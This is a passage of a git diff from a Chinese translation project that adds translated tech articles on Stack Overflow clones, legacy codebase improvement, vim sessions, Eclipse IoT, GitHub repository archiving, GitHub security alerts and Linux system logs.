(ID identity primary key, + BODY text, + UPVOTES integer not null default 0, + DOWNVOTES integer not null default 0, + QUESTION integer references QUESTION(ID)) + +如果你告诉一个开发者去复制 Stack Overflow ,进入他脑海中的就是上面的两个 SQL 表和足够的 HTML 文件来显示它们,而不用格式化,这在一个周末里是完全 +可以实现的,聪明的人会意识到他们需要实现登陆、注销和评论,点赞需要绑定到用户。但是这在一个周末内仍然是完全可行的。这仅仅是在 SQL 后端里加上两张 +左右的表,而 HTML 则用来展示内容,使用像 Django 这样的框架,你甚至可以免费获得基本的用户和评论。 + +但是那不是和 Stack Overflow 相关的,无论你对 Stack Overflow 的感受如何,大多数访问者似乎都认为用户体验从头到尾都很流畅,他们感觉他们和一个 +好产品相互影响。即使我没有更好的了解,我也会猜测 Stack Overflow 在数据库模式方面取得了持续的成功-并且有机会去阅读 Stack Overflow 的源代码, +我知道它实际上有多么的小,这些是一个极大的 spit 和 Polish 的集合,成为了一个具有高可用性的主要网站,一个开发者,问一个东西被克隆有多难, +仅仅不认为和 Polish 相关,因为 Polish 是实现结果附带的。 + +这就是为什么 Stack Overflow 的开放源代码克隆会失败,即使一些人在设法实现大部分 Stack Overflow 的“规范”,也会有一些关键区域会将他们绊倒, +举个例子,如果你把目标市场定在了终端用户上,你要么需要一个图形界面去配置规则,要么聪明的开发者会决定哪些徽章具有足够的通用性,去继续所有的 +安装,实际情况是,开发者发牢骚和抱怨你不能实现一个真实的综合性的像 badges 的图形用户界面,然后 bikeshed 任何的建议,为因为标准的 badges +在范围内太远,他们会迅速避开选择其他方向,他们最后会带着相同的有 bug 追踪器的解决方案赶上,就像他们工作流程的概要使用一样: +开发者通过任意一种方式实现一个通用的机制,任何一个人完全都能轻松地使用 Python、PHP 或任意一门语言中的系统 API 来工作,能简单为他们自己增加 +自定义设置,PHP 和 Python 是学起来很简单的,并且比起曾经的图形界面更加的灵活,为什么还要操心其他事呢? + +同样的,节制和管理界面可以被削减。如果你是一个管理员,你可以进入 SQL 服务器,所以你可以做任何真正的管理-就像这样,管理员可以通过任何的 Django +管理和类似的系统给你提供支持,因为,毕竟只有少数用户是 mods,mods 应该理解网站是怎么运作、停止的。当然,没有 Stack Overflow 的接口失败会被纠正 +,即使 Stack Overflow 的愚蠢的要求,你必须知道如何去使用 openID (它是最糟糕的缺点)最后得到修复。我确信任何的开源的克隆都会狂热地跟随它- +即使 GNOME 和 KDE 多年来亦步亦趋地复制 windows ,而不是尝试去修复它自己最明显的缺陷。 + +开发者可能不会关心应用的这些部分,但是最终用户会,当他们尝试去决定使用哪个应用时会去考虑这些。就好像一家好的软件公司希望通过确保其产品在出货之前 +是一流的来降低其支持成本一样,所以,同样的,懂行的消费者想在他们购买这些产品之前确保产品好用,以便他们不需要去寻求帮助,开源产品就失败在这种地方 +,一般来说,专有解决方案会做得更好。 + +这不是说开源软件没有他们自己的立足之地,这个博客运行在 Apache,Django,PostgreSQL 和 Linux 上。但是让我告诉你,配置这些堆栈不是为了让人心灰意懒 +,PostgreSQL 需要在老版本上移除设置。然后,在 Ubuntu 和 FreeBSD 最新的版本上,仍然要求用户搭建第一个数据库集群,MS SQL不需要这些东西,Apache... +天啊,甚至没有让我开始尝试去向一个初学者用户解释如何去得到虚拟机,MovableType,一对 Django 应用程序,而且所有的 WordPress 都可以在一个单一的安装下 +顺利运行,像在地狱一样,只是试图解释 Apache 的分叉线程变换给技术上精明的非开发人员就是一个噩梦,IIS 7 和操作系统的 Apache 服务器是非常闭源的, +图形界面管理程序配置这些这些相同的堆栈非常的简单,Django 是一个伟大的产品,但是它只是基础架构而已,我认为开源软件做的很好,恰恰是因为推动开发者去 +贡献的动机 + +下次你看见一个你喜欢的应用,认为所有面向用户的细节非常长和辛苦,就会去让它用起来更令人开心,在谴责你如何能普通的实现整个的可恶的事在一个周末, +十分之九之后,当你认为一个应用的实现简单地简直可笑,你就完全的错失了故事另一边的用户 + +via: https://bitquabit.com/post/one-which-i-call-out-hacker-news/ + +作者:Benjamin Pollack 译者:hopefully2333 校对:校对者ID + +本文由 LCTT 原创编译,Linux中国 荣誉推出 diff --git a/translated/tech/20170530 How to Improve a Legacy Codebase.md b/translated/tech/20170530 How to Improve a Legacy Codebase.md new file mode 100644 index 0000000000..a1869b0449 --- /dev/null +++ b/translated/tech/20170530 How to Improve a Legacy Codebase.md @@ -0,0 +1,104 @@ +# 如何改善遗留的代码库 + +这在每一个程序员,项目管理员,团队领导的一生中都会至少发生一次。原来的程序员早已离职去度假了,留下了一坨几百万行屎一样的代码和文档(如果有的话),一旦接手这些代码,想要跟上公司的进度简直让人绝望。 + +你的工作是带领团队摆脱这个混乱的局面 + +当你的第一反应过去之后,你开始去熟悉这个项目,公司的管理层都在关注着你,所以项目只能成功,然而,看了一遍代码之后却发现很大的可能会失败。那么该怎么办呢? + +幸运(不幸)的是我已经遇到好几次这种情况了,我和我的小伙伴发现将这坨热气腾腾的屎变成一个健康可维护的项目是非常值得一试的。下面这些是我们的一些经验: + +### 备份 + +在开始做任何事情之前备份与之可能相关的所有文件。这样可以确保不会丢失任何可能会在另外一些地方很重要的信息。一旦修改其中一些文件,你可能花费一天或者更多天都解决不了这个愚蠢的问题,配置数据通常不受版本控制,所以特别容易受到这方面影响,如果定期备份数据时连带着它一起备份了,还是比较幸运的。所以谨慎总比后悔好,复制所有东西到一个绝对安全的地方吧,除非这些文件是只读模式否则不要轻易碰它。 + +### 必须确保代码能够在生产环境下构建运行并产出,这是重要的先决条件。 + +之前我假设环境已经存在,所以完全丢了这一步,Hacker News 的众多网友指出了这一点并且证明他们是对的:第一步是确认你知道在生产环境下运行着什么东西,也意味着你需要在你的设备上构建一个跟生产环境上运行的版本每一个字节都一模一样的版本。如果你找不到实现它的办法,一旦你将它投入生产环境,你很可能会遭遇一些很糟糕的事情。确保每一部分都尽力测试,之后在你足够信任它能够很好的运行的时候将它部署生产环境下。无论它运行的怎么样都要做好能够马上切换回旧版本的准备,确保日志记录下了所有情况,以便于接下来不可避免的 “验尸” 。 + +### 冻结数据库 + +直到你修改代码之前尽可能冻结你的数据库,在你特别熟悉代码库和遗留代码之后再去修改数据库。在这之前过早的修改数据库的话,你可能会碰到大问题,你会失去让新旧代码和数据库一起构建稳固的基础的能力。保持数据库完全不变,就能比较新的逻辑代码和旧的逻辑代码运行的结果,比较的结果应该跟预期的没有差别。 + +### 写测试 + +在你做任何改变之前,尽可能多的写下端到端测试和集成测试。在你能够清晰的知道旧的是如何工作的情况下确保这些测试能够正确的输出(准备好应对一些突发状况)。这些测试有两个重要的作用,其一,他们能够在早期帮助你抛弃一些错误观念,其二,在你写新代码替换旧代码的时候也有一定防护作用。 + +自动化测试,如果你也有 CI 的使用经验请使用它,并且确保在你提交代码之后能够快速的完成所有测试。 + +### 日志监控 + +如果旧设备依然可用,那么添加上监控功能。使用一个全新的数据库,为每一个你能想到的事件都添加一个简单的计数器,并且根据这些事件的名字添加一个函数增加这些计数器。用一些额外的代码实现一个带有时间戳的事件日志,这是一个好办法知道有多少事件导致了另外一些种类的事件。例如:用户打开 APP ,用户关闭 APP 。如果这两个事件导致后端调用的数量维持长时间的不同,这个数量差就是当前打开的 APP 的数量。如果你发现打开 APP 比关闭 APP 多的时候,你就必须要知道是什么原因导致 APP 关闭了(例如崩溃)。你会发现每一个事件都跟其他的一些事件有许多不同种类的联系,通常情况下你应该尽量维持这些固定的联系,除非在系统上有一个明显的错误。你的目标是减少那些错误的事件,尽可能多的在开始的时候通过使用计数器在调用链中降低到指定的级别。(例如:用户支付应该得到相同数量的支付回调)。 + +这是简单的技巧去将每一个后端应用变成一个就像真实的簿记系统一样,所有数字必须匹配,只要他们在某个地方都不会有什么问题。 + +随着时间的推移,这个系统在监控健康方面变得非常宝贵,而且它也是使用源码控制修改系统日志的一个好伙伴,你可以使用它确认 BUG 出现的位置,以及对多种计数器造成的影响。 + +我通常保持 5 分钟(一小时 12 次)记录一次计数器,如果你的应用生成了更多或者更少的事件,你应该修改这个时间间隔。所有的计数器公用一个数据表,每一个记录都只是简单的一行。 + +### 一次只修改一处 + +不要完全陷入在提高代码或者平台可用性的同时添加新特性或者是修复 BUG 的陷阱。这会让你头大而且将会使你之前建立的测试失效,现在必须问问你自己,每一步的操作想要什么样的结果。 + +### 修改平台 + +如果你决定转移你的应用到另外一个平台,最主要的是跟之前保持一样。如果你觉得你会添加更多的文档和测试,但是不要忘记这一点,所有的业务逻辑和相互依赖跟从前一样保持不变。 + +### 修改架构 + +接下来处理的是改变应用的结构(如果需要)。这一点上,你可以自由的修改高层的代码,通常是降低模块间的横向联系,这样可以降低代码活动期间对终端用户造成的影响范围。如果老代码是庞大的,那么现在正是让他模块化的时候,将大段代码分解成众多小的,不过不要把变量的名字和他的数据结构分开。 + +Hacker News [mannykannot][1] 网友指出,修改架构并不总是可行,如果你特别不幸的话,你可能为了改变一些架构必须付出沉重的代价。我也赞同这一点,我应该加上这一点,因此这里有一些补充。我非常想补充的是如果你修改高级代码的时候修改了一点点底层代码,那么试着限制只修改一个文件或者最坏的情况是只修改一个子系统,所以尽可能限制修改的范围。否则你可能很难调试刚才所做的更改。 + +### 底层代码的重构 + +现在,你应该非常理解每一个模块的作用了,准备做一些真正的工作吧:重构代码以提高其可维护性并且使代码做好添加新功能的准备。这很可能是项目中最消耗时间的部分,记录你所做的任何操作,在你彻底的记录模块并且理解之前不要对它做任何修改。之后你可以自由的修改变量名、函数名以及数据结构以提高代码的清晰度和统一性,然后请做测试(情况允许的话,包括单元测试)。 + +### 修复 bugs + +现在准备做一些用户可见的修改,战斗的第一步是修复很多积累了一整年的bugs,像往常一样,首先证实 bug 仍然存在,然后编写测试并修复这个 bug,你的 CI 和端对端测试应该能避免一些由于不太熟悉或者一些额外的事情而犯的错误。 + +### 升级数据库 + + +如果在一个坚实且可维护的代码库上完成所有工作,如果你有更改数据库模式的计划,可以使用不同的完全替换数据库。 +把所有的这些都做完将能够帮助你更可靠的修改而不会碰到问题,你会完全的测试新数据库和新代码,所有测试可以确保你顺利的迁移。 + +### 按着路线图执行 + +祝贺你脱离的困境并且可以准备添加新功能了。 + +### 任何时候都不要尝试彻底重写 + +彻底重写是那种注定会失败的项目,一方面,你在一个未知的领域开始,所以你甚至不知道构建什么,另一方面,你会把所以的问题都推到新系统马上就要上线的前一天,非常不幸的是,这也是你失败的时候,假设业务逻辑存在问题,你会得到异样的眼光,那时您会突然明白为什么旧系统会用某种奇怪的方式来工作,最终也会意识到能将旧系统放在一起工作的人也不都是白痴。在那之后。如果你真的想破坏公司(和你自己的声誉),那就重写吧,但如果你足够聪明,彻底重写系统通常不会成为一个摆到桌上讨论的选项。 + +### 所以,替代方法是增量迭代工作 + +要解开这些线团最快方法是,使用你熟悉的代码中任何的元素(它可能是外部的,他可以是内核模块),试着使用旧的上下文去增量提升,如果旧的构建工具已经不能用了,你将必须使用一些技巧(看下面)至少当你开始做修改的时候,试着尽力保留已知的工作。那样随着代码库的提升你也对代码的作用更加理解。一个典型的代码提交应该最多两行。 + +### 发布! + +每一次的修改都发布到生产环境,即使一些修改不是用户可见的。使用最少的步骤也是很重要的,因为当你缺乏对系统的了解时,只有生产环境能够告诉你问题在哪里,如果你只做了一个很小的修改之后出了问题,会有一些好处: + +* 很容易弄清楚出了什么问题 +* 这是一个改进流程的好位置 +* 你应该马上更新文档展示你的新见解 + +### 使用代理的好处 +如果你做 web 开发时在旧系统和用户之间加了代理。你能很容易的控制每一个网址哪些请求旧系统,哪些重定向到新系统,从而更轻松更精确的控制运行的内容以及谁能够看到。如果你的代理足够的聪明,你可以使用它发送一定比例的流量到个人的 URL,直到你满意为止,如果你的集成测试也连接到这个接口那就更好了。 + +### 是的,这会花费很多时间 +这取决于你怎样看待它的,这是事实会有一些重复的工作涉及到这些步骤中。但是它确实有效,对于进程的任何一个优化都将使你对这样系统更加熟悉。我会保持声誉,并且我真的不喜欢在工作期间有负面的意外。如果运气好的话,公司系统已经出现问题,而且可能会影响客户。在这样的情况下,如果你更多地是牛仔的做事方式,并且你的老板同意可以接受冒更大的风险,我比较喜欢完全控制整个流程得到好的结果而不是节省两天或者一星期,但是大多数公司宁愿采取稍微慢一点但更确定的胜利之路。 + +-------------------------------------------------------------------------------- + +via: https://jacquesmattheij.com/improving-a-legacy-codebase + +作者:[Jacques Mattheij][a] +译者:[aiwhj](https://github.com/aiwhj) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://jacquesmattheij.com/ +[1]:https://news.ycombinator.com/item?id=14445661 diff --git a/translated/tech/20170910 Cool vim feature sessions.md b/translated/tech/20170910 Cool vim feature sessions.md new file mode 100644 index 0000000000..49ee43fda1 --- /dev/null +++ b/translated/tech/20170910 Cool vim feature sessions.md @@ -0,0 +1,44 @@ +vim 的酷功能:会话! +============================================================• + +昨天我在编写我的[vimrc][5]的时候了解到一个很酷的 vim 功能!(主要为了添加 fzf 和 ripgrep 插件)。这是一个内置功能,不需要特别的插件。 + +所以我画了一个漫画。 + +基本上你可以用下面的命令保存所有你打开的文件和当前的状态 + +``` +:mksession ~/.vim/sessions/foo.vim + +``` + +接着用 `:source ~/.vim/sessions/foo.vim` 或者  `vim -S ~/.vim/sessions/foo.vim` 还原会话。非常酷! + +一些 vim 插件给 vim 会话添加了额外的功能: + +* [https://github.com/tpope/vim-obsession][1] + +* [https://github.com/mhinz/vim-startify][2] + +* [https://github.com/xolox/vim-session][3] + +这是漫画: + +![](https://jvns.ca/images/vimsessions.png) + +-------------------------------------------------------------------------------- + +via: https://jvns.ca/blog/2017/09/10/vim-sessions/ + +作者:[Julia Evans ][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://jvns.ca/about +[1]:https://github.com/tpope/vim-obsession +[2]:https://github.com/mhinz/vim-startify +[3]:https://github.com/xolox/vim-session +[4]:https://jvns.ca/categories/vim +[5]:https://github.com/jvns/vimconfig/blob/master/vimrc diff --git a/translated/tech/20171020 How Eclipse is advancing IoT development.md b/translated/tech/20171020 How Eclipse is advancing IoT development.md new file mode 100644 index 0000000000..0de4f38ea1 --- /dev/null +++ b/translated/tech/20171020 How Eclipse is advancing IoT development.md @@ -0,0 +1,77 @@ +translated by smartgrids +Eclipse 如何助力 IoT 发展 +============================================================ + +### 开源组织的模块发开发方式非常适合物联网。 + +![How Eclipse is advancing IoT development](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/OSDC_BUS_ArchitectureOfParticipation_520x292.png?itok=FA0Uuwzv "How Eclipse is advancing IoT development") +图片来源: opensource.com + +[Eclipse][3] 可能不是第一个去研究物联网的开源组织。但是,远在 IoT 家喻户晓之前,该基金会在 2001 年左右就开始支持开源软件发展商业化。九月 Eclipse 物联网日和 RedMonk 的 [ThingMonk 2017][4] 一块举行,着重强调了 Eclipse 在 [物联网发展][5] 中的重要作用。它现在已经包含了 28 个项目,覆盖了大部分物联网项目需求。会议过程中,我和负责 Eclipse 市场化运作的 [Ian Skerritt][6] 讨论了 Eclipse 的物联网项目以及如何拓展它。 + +###物联网的最新进展? +我问 Ian 物联网同传统工业自动化,也就是前几十年通过传感器和相应工具来实现工厂互联的方式有什么不同。 Ian 指出很多工厂是还没有互联的。 +另外,他说“ SCADA[监控和数据分析] 系统以及工厂底层技术都是私有、独立性的。我们很难去改变它,也很难去适配它们…… 现在,如果你想运行一套生产系统,你需要设计成百上千的单元。生产线想要的是满足用户需求,使制造过程更灵活,从而可以不断产出。” 这也就是物联网会带给制造业的一个很大的帮助。 + + +###Eclipse 物联网方面的研究 +Ian 对于 Eclipse 在物联网的研究是这样描述的:“满足任何物联网解决方案的核心基础技术” ,通过使用开源技术,“每个人都可以使用从而可以获得更好的适配性。” 他说,Eclipse 将物联网视为包括三层互联的软件栈。从更高的层面上看,这些软件栈(按照大家常见的说法)将物联网描述为跨越三个层面的网络。特定的观念可能认为含有更多的层面,但是他们一直符合这个三层模型的功能的: + +* 一种可以装载设备(例如设备、终端、微控制器、传感器)用软件的堆栈。 +* 将不同的传感器采集到的数据信息聚合起来并传输到网上的一类网关。这一层也可能会针对传感器数据检测做出实时反映。 +* 物联网平台后端的一个软件栈。这个后端云存储数据并能根据采集的数据比如历史趋势、预测分析提供服务。 + +这三个软件栈在 Eclipse 的白皮书 “ [The Three Software Stacks Required for IoT Architectures][7] ”中有更详细的描述。 + +Ian 说在这些架构中开发一种解决方案时,“需要开发一些特殊的东西,但是很多底层的技术是可以借用的,像通信协议、网关服务。需要一种模块化的方式来满足不用的需求场合。” Eclipse 关于物联网方面的研究可以概括为:开发模块化开源组件从而可以被用于开发大量的特定性商业服务和解决方案。 + +###Eclipse 的物联网项目 + +在众多一杯应用的 Eclipse 物联网应用中, Ian 举了两个和 [MQTT][8] 有关联的突出应用,一个设备与设备互联(M2M)的物联网协议。 Ian 把它描述成“一个专为重视电源管理工作的油气传输线监控系统的信息发布/订阅协议。MQTT 已经是众多物联网广泛应用标准中很成功的一个。” [Eclipse Mosquitto][9] 是 MQTT 的代理,[Eclipse Paho][10] 是他的客户端。 +[Eclipse Kura][11] 是一个物联网网关,引用 Ian 的话,“它连接了很多不同的协议间的联系”包括蓝牙、Modbus、CANbus 和 OPC 统一架构协议,以及一直在不断添加的协议。一个优势就是,他说,取代了你自己写你自己的协议, Kura 提供了这个功能并将你通过卫星、网络或其他设备连接到网络。”另外它也提供了防火墙配置、网络延时以及其它功能。Ian 也指出“如果网络不通时,它会存储信息直到网络恢复。” + +最新的一个项目中,[Eclipse Kapua][12] 正尝试通过微服务来为物联网云平台提供不同的服务。比如,它集成了通信、汇聚、管理、存储和分析功能。Ian 说“它正在不断前进,虽然还没被完全开发出来,但是 Eurotech 和 RedHat 在这个项目上非常积极。” +Ian 说 [Eclipse hawkBit][13] ,软件更新管理的软件,是一项“非常有趣的项目。从安全的角度说,如果你不能更新你的设备,你将会面临巨大的安全漏洞。”很多物联网安全事故都和无法更新的设备有关,他说,“ HawkBit 可以基本负责通过物联网系统来完成扩展性更新的后端管理。” + +物联网设备软件升级的难度一直被看作是难度最高的安全挑战之一。物联网设备不是一直连接的,而且数目众多,再加上首先设备的更新程序很难完全正常。正因为这个原因,关于无赖女王软件升级的项目一直是被当作重要内容往前推进。 + +###为什么物联网这么适合 Eclipse + +在物联网发展趋势中的一个方面就是关于构建模块来解决商业问题,而不是宽约工业和公司的大物联网平台。 Eclipse 关于物联网的研究放在一系列模块栈、提供特定和大众化需求功能的项目,还有就是指定目标所需的可捆绑式中间件、网关和协议组件上。 + + +-------------------------------------------------------------------------------- + + + +作者简介: + +Gordon Haff - Gordon Haff 是红帽公司的云营销员,经常在消费者和工业会议上讲话,并且帮助发展红帽全办公云解决方案。他是 计算机前言:云如何如何打开众多出版社未来之门 的作者。在红帽之前, Gordon 写了成百上千的研究报告,经常被引用到公众刊物上,像纽约时报关于 IT 的议题和产品建议等…… + +-------------------------------------------------------------------------------- + +转自: https://opensource.com/article/17/10/eclipse-and-iot + +作者:[Gordon Haff ][a] +译者:[smartgrids](https://github.com/smartgrids) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/ghaff +[1]:https://opensource.com/article/17/10/eclipse-and-iot?rate=u1Wr-MCMFCF4C45IMoSPUacCatoqzhdKz7NePxHOvwg +[2]:https://opensource.com/user/21220/feed +[3]:https://www.eclipse.org/home/ +[4]:http://thingmonk.com/ +[5]:https://iot.eclipse.org/ +[6]:https://twitter.com/ianskerrett +[7]:https://iot.eclipse.org/resources/white-papers/Eclipse%20IoT%20White%20Paper%20-%20The%20Three%20Software%20Stacks%20Required%20for%20IoT%20Architectures.pdf +[8]:http://mqtt.org/ +[9]:https://projects.eclipse.org/projects/technology.mosquitto +[10]:https://projects.eclipse.org/projects/technology.paho +[11]:https://www.eclipse.org/kura/ +[12]:https://www.eclipse.org/kapua/ +[13]:https://eclipse.org/hawkbit/ +[14]:https://opensource.com/users/ghaff +[15]:https://opensource.com/users/ghaff +[16]:https://opensource.com/article/17/10/eclipse-and-iot#comments diff --git a/translated/tech/20171108 Archiving repositories.md b/translated/tech/20171108 Archiving repositories.md new file mode 100644 index 0000000000..3d1a328541 --- /dev/null +++ b/translated/tech/20171108 Archiving repositories.md @@ -0,0 +1,37 @@ +归档仓库 +==================== + + +因为仓库不再活跃开发或者你不想接受额外的贡献并不意味着你想要删除它。现在在 Github 上归档仓库让它变成只读。 + + [![archived repository banner](https://user-images.githubusercontent.com/7321362/32558403-450458dc-c46a-11e7-96f9-af31d2206acb.png)][1] + +归档一个仓库让它对所有人只读(包括仓库拥有者)。这包括编辑仓库、问题、合并请求、标记、里程碑、维基、发布、提交、标签、分支、反馈和评论。没有人可以在一个归档的仓库上创建新的问题、合并请求或者评论,但是你仍可以 fork 仓库-允许归档的仓库在其他地方继续开发。 + +要归档一个仓库,进入仓库设置页面并点在这个仓库上点击归档。 + + [![archive repository button](https://user-images.githubusercontent.com/125011/32273119-0fc5571e-bef9-11e7-9909-d137268a1d6d.png)][2] + +在归档你的仓库前,确保你已经更改了它的设置并考虑关闭所有的开放问题和合并请求。你还应该更新你的 README 和描述来让它让访问者了解他不再能够贡献。 + +如果你改变了主意想要解除归档你的仓库,在相同的地方点击解除归档。请注意大多数归档仓库的设置是隐藏的,并且你需要解除归档来改变它们。 + + [![archived labelled repository](https://user-images.githubusercontent.com/125011/32541128-9d67a064-c466-11e7-857e-3834054ba3c9.png)][3] + +要了解更多,请查看[这份文档][4]中的归档仓库部分。归档快乐! + +-------------------------------------------------------------------------------- + +via: https://github.com/blog/2460-archiving-repositories + +作者:[MikeMcQuaid ][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://github.com/MikeMcQuaid +[1]:https://user-images.githubusercontent.com/7321362/32558403-450458dc-c46a-11e7-96f9-af31d2206acb.png +[2]:https://user-images.githubusercontent.com/125011/32273119-0fc5571e-bef9-11e7-9909-d137268a1d6d.png +[3]:https://user-images.githubusercontent.com/125011/32541128-9d67a064-c466-11e7-857e-3834054ba3c9.png +[4]:https://help.github.com/articles/about-archiving-repositories/ diff --git a/translated/tech/20171116 Introducing security alerts on GitHub.md b/translated/tech/20171116 Introducing security alerts on GitHub.md new file mode 100644 index 0000000000..b8f0afba17 --- /dev/null +++ b/translated/tech/20171116 Introducing security alerts on GitHub.md @@ -0,0 +1,48 @@ +介绍 GitHub 上的安全警报 +==================================== + + +上个月,我们用依赖关系图让你更容易跟踪你代码依赖的的项目,目前支持 Javascript 和 Ruby。如今,超过 75% 的 GitHub 项目有依赖,我们正在帮助你做更多的事情,而不只是关注那些重要的项目。在启用依赖关系图后,当我们检测到你的依赖中有漏洞或者来自 Github 社区中建议的已知修复时通知你。 + + [![Security Alerts & Suggested Fix](https://user-images.githubusercontent.com/594029/32851987-76c36e4a-c9eb-11e7-98fc-feb39fddaadb.gif)][1] + +### 如何开始使用安全警报 + +无论你的项目时私有还是公有的,安全警报都会为团队中的正确人员提供重要的漏洞信息。 + +启用你的依赖图 + +公开仓库将自动启用依赖关系图和安全警报。对于私人仓库,你需要在仓库设置中添加安全警报,或者在 “Insights” 选项卡中允许访问仓库的 “依赖关系图” 部分。 + +设置通知选项 + +启用依赖关系图后,管理员将默认收到安全警报。管理员还可以在依赖关系图设置中将团队或个人添加为安全警报的收件人。 + +警报响应 + +当我们通知你潜在的漏洞时,我们将突出显示我们建议更新的任何依赖关系。如果存在已知的安全版本,我们将使用机器学习和公开数据中选择一个,并将其包含在我们的建议中。 + +### 漏洞覆盖率 + +有 [CVE ID][2](公开披露的[国家漏洞数据库][3]中的漏洞)的漏洞将包含在安全警报中。但是,并非所有漏洞都有 CVE ID,甚至许多公开披露的漏洞也没有。随着安全数据的增长,我们将继续更好地识别漏洞。如需更多帮助来管理安全问题,请查看我们的[ GitHub Marketplace 中的安全合作伙伴][4]。 + +这是使用世界上最大的开源数据集的下一步,可以帮助你保持代码安全并做到最好。依赖关系图和安全警报目前支持 JavaScript 和 Ruby,并将在 2018 年提供 Python 支持。 + +[了解更多关于安全警报][5] + +-------------------------------------------------------------------------------- + +via: https://github.com/blog/2470-introducing-security-alerts-on-github + +作者:[mijuhan ][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://github.com/mijuhan +[1]:https://user-images.githubusercontent.com/594029/32851987-76c36e4a-c9eb-11e7-98fc-feb39fddaadb.gif +[2]:https://cve.mitre.org/ +[3]:https://nvd.nist.gov/ +[4]:https://github.com/marketplace/category/security +[5]:https://help.github.com/articles/about-security-alerts-for-vulnerable-dependencies/ diff --git a/translated/tech/20171117 System Logs: Understand Your Linux System.md b/translated/tech/20171117 System Logs: Understand Your Linux System.md new file mode 100644 index 0000000000..dceea12a63 --- /dev/null +++ b/translated/tech/20171117 System Logs: Understand Your Linux System.md @@ -0,0 +1,68 @@ +### 系统日志: 了解你的Linux系统 + +![chabowski](https://www.suse.com/communities/blog/files/2016/03/chabowski_avatar_1457537819-100x100.jpg) + By: [chabowski][1] + +本文摘自教授Linux小白(或者非资深桌面用户)技巧的系列文章. 该系列文章旨在为由LinuxMagazine基于 [openSUSE Leap][3] 发布的第30期特别版 “[Getting Started with Linux][2]” 提供补充说明. + +本文作者是 Romeo S. Romeo, 他是一名 PDX-based enterprise Linux 专家,转为创新企业提供富有伸缩性的解决方案. + +Linux系统日志非常重要. 后台运行的程序(通常被称为守护进程或者服务进程)处理了你Linux系统中的大部分任务. 当这些守护进程工作时,它们将任务的详细信息记录进日志文件中,作为他们做过什么的历史信息. 这些守护进程的工作内容涵盖从使用原子钟同步时钟到管理网络连接. 所有这些都被记录进日志文件,这样当有错误发生时,你可以通过查阅特定的日志文件来看出发生了什么. + +![](https://www.suse.com/communities/blog/files/2017/11/markus-spiske-153537-300x450.jpg) + +Photo by Markus Spiske on Unsplash + +有很多不同的日志. 历史上, 他们一般以纯文本的格式存储到 `/var/log` 目录中. 现在依然有很多日志这样做, 你可以很方便的使用 `less` 来查看它们. +在新装的 `openSUSE Leap 42.3` 以及大多数现代操作系统上,重要的日志由 `systemd` 初始化系统存储. `systemd`这套系统负责启动守护进程并在系统启动时让计算机做好被使用的准备。 +由 `systemd` 记录的日志以二进制格式存储, 这使地它们消耗的空间更小,更容易被浏览,也更容易被导出成其他各种格式,不过坏处就是你必须使用特定的工具才能查看. +好在, 这个工具已经预安装在你的系统上了: 它的名字叫 `journalctl`,而且默认情况下, 它会将每个守护进程的所有日志都记录到一个地方. + +只需要运行 `journalctl` 命令就能查看你的 `systemd` 日志了. 它会用 `less` 分页器显示各种日志. 为了让你有个直观的感受, 下面是`journalctl` 中摘录的一条日志记录: + +``` +Jul 06 11:53:47 aaathats3as pulseaudio[2216]: [pulseaudio] alsa-util.c: Disabling timer-based scheduling because running inside a VM. +``` + +这条独立的日志记录以此包含了记录的日期和时间, 计算机名, 记录日志的进程名, 记录日志的进程PID, 以及日志内容本身. + +若系统中某个程序运行出问题了, 则可以查看日志文件并搜索(使用 “/” 加上要搜索的关键字)程序名称. 有可能导致该程序出问题的错误会记录到系统日志中. +有时,错误信息会足够详细让你能够修复该问题. 其他时候, 你需要在Web上搜索解决方案. Google就很适合来搜索奇怪的Linux问题. +![](https://www.suse.com/communities/blog/files/2017/09/Sunglasses_Emoji-450x450.png) +不过搜索时请注意你只输入了日志的内容, 行首的那些信息(日期, 主机名, 进程ID) 是无意义的,会干扰搜索结果. + +解决方法一般在搜索结果的前几个连接中就会有了. 当然,你不能只是无脑得运行从互联网上找到的那些命令: 请一定先搞清楚你要做的事情是什么,它的效果会是什么. +据说, 从系统日志中查询日志要比直接搜索描述故障的关键字要有用的多. 因为程序出错有很多原因, 而且同样的故障表现也可能由多种问题引发的. + +比如, 系统无法发声的原因有很多, 可能是播放器没有插好, 也可能是声音系统出故障了, 还可能是缺少合适的驱动程序. +如果你只是泛泛的描述故障表现, 你会找到很多无关的解决方法,而你也会浪费大量的时间. 而指定搜索日志文件中的内容, 你只会查询出他人也有相同日志内容的结果. +你可以对比一下图1和图2. + +![](https://www.suse.com/communities/blog/files/2017/11/picture1-450x450.png) + +图 1 搜索系统的故障表现只会显示泛泛的,不精确的结果. 这种搜索通常没什么用. + +![](https://www.suse.com/communities/blog/files/2017/11/picture2-450x450.png) + +图 2 搜索特定的日志行会显示出精确的,有用的结果. 这种搜索通常很有用. + +也有一些系统不用 `journalctl` 来记录日志. 在桌面系统中最常见的这类日志包括用于 `/var/log/zypper.log` 记录openSUSE包管理器的行为; `/var/log/boot.log` 记录系统启动时的消息,这类消息往往滚动的特别块,根本看不过来; `/var/log/ntp` 用来记录 Network Time Protocol 守护进程同步时间时发生的错误. +另一个存放硬件故障信息的地方是 `Kernel Ring Buffer`(内核环状缓冲区), 你可以输入 `demesg -H` 命令来查看(这条命令也会调用 `less` 分页器来查看). +`Kernel Ring Buffer` 存储在内存中, 因此会在重启电脑后丢失. 不过它包含了Linux内核中的重要事件, 比如新增了硬件, 加载了模块, 以及奇怪的网络错误. + +希望你已经准备好深入了解你的Linux系统了! 祝你玩的开心! + +-------------------------------------------------------------------------------- + +via: 